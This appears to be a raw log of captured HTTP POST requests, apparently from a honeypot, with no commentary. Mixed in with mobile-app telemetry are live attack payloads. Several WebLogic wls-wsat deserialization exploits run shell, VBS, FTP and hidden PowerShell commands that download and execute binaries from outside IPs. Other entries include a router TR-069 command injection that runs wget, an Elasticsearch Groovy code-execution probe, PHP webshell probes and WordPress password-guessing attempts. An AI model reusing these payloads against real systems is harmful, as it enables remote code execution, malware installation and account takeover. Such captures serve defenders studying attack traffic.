Q6APx9PAMd/XJDquZkgfzlM/uE/lLOFtWM7zrfjI7IRIu7KlQ2Gz4rMQDlTwx+/FgtHS3FuAkO0DEHE6ciSaKALSjj6jj4sjKTlaq/qDJToWUwikG6hNu2elBz/vLhPgMOL6Dsv4AG/os0BR/DxprX0a1MqDlrk+OJpylXfkXi98c5KnoUG/vhAv356G/P6G0O6Unfg4/Adgj64vfqUUx2qypicdXHSwHQyHUR6yMIlCm5+JXmOk2z7pj+Ffk4x0i83bZgkOsFD1OFvA0hSL3OSbI3tBHkE9BnJ/4aof2VGDsuF7aAhjJGitNEzU6eCGlKJFiOyjrfjz95n0bB0g2TJHl+lcNrFYA6Ma4A6WU7aEf9zQn/+O2l1tprdAX73kyi5tGQ==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=146948360897&a=PSCMN&i=2734486398&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 55
[binary request body; bytes not representable as text]
POST http://u.uc123.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: u.uc123.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://analytics.seattleclouds.com/trackevent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: analytics.seattleclouds.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 230
screenSize=2&os=1&username=tculang&osVersion=4.4.4&appId=videolaguanak&param=&deviceModel=Xiaomi+MI+4LTE&connectionType=2&uniqueAppId=com.ramlidev.videolaguanak&publisherid=tashlik&type=2&screenDensity=480&deviceId=6ccc52a8048214f
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=654321
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
[binary request body; bytes not representable as text]
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
[binary request body; bytes not representable as text]
POST /wls-wsat/CoordinatorPortType HTTP/1.0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Type: text/xml
Content-Length: 774
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=172&pwd=172444444
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
467267
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
af767e5ea1f2c04d4863eeb1a884f525
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM--
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E 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</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]
POST http://check.proxyradar.com/azenv.php?auth=149450839181&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
[binary request body; bytes not representable as text]
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=admin222
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 846
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
720004
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
4714488b47edf2de59286c4fe288e0c4
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1075
Content-Type: multipart/form-data; boundary=lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
290379
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
e2e5d8f9259e0d10459ab23af8ea7e66
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=!@#$%^&
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1021
Content-Type: multipart/form-data; boundary=4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
520164
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
de38b380327f7bdacf15a9c1ceb52570
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU--
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496226066453
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2388
POST http://t17.proxy-checks.com/favicon.ico HTTP/1.1
Host: t17.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
Q/ALx9LKN2DC+2uam7wU3+i0hAlCl4hkQdrU2+fxsrZkNBzImwpBPUrcP+4+V+H00XhfY3b5dTTvBtVUSGnj0KxXmsPG1SF3wjHsQF1Qo6xMNnyLbLh3krlTjAcGYpXhOp+qX3kM83AmI/ziImbruN7pD61GENJfa0aIa3tngSpX3Zpgyk/KRRS8gCyeCdczWDTy6KRDILFpqVJX1mTYvoEu709soJYguAooKn+UvsJO5u4TwT+RyKdFh8IlLfbqdFAf5hHCXTsFw3uSQEZGZ4ZmTEzst02Nj4M9sM/2ZD/D3Z92maYAF+YAiy0JKVnRmZbTQiGCxHum9+NSCgw8RI6QPVVH5RrCTLKbu22umLSZgg9WHG9wVWS5fEVNlj6Rxqs18K9ffCRQafiNCfLEEWgG
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
200826
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="sig"
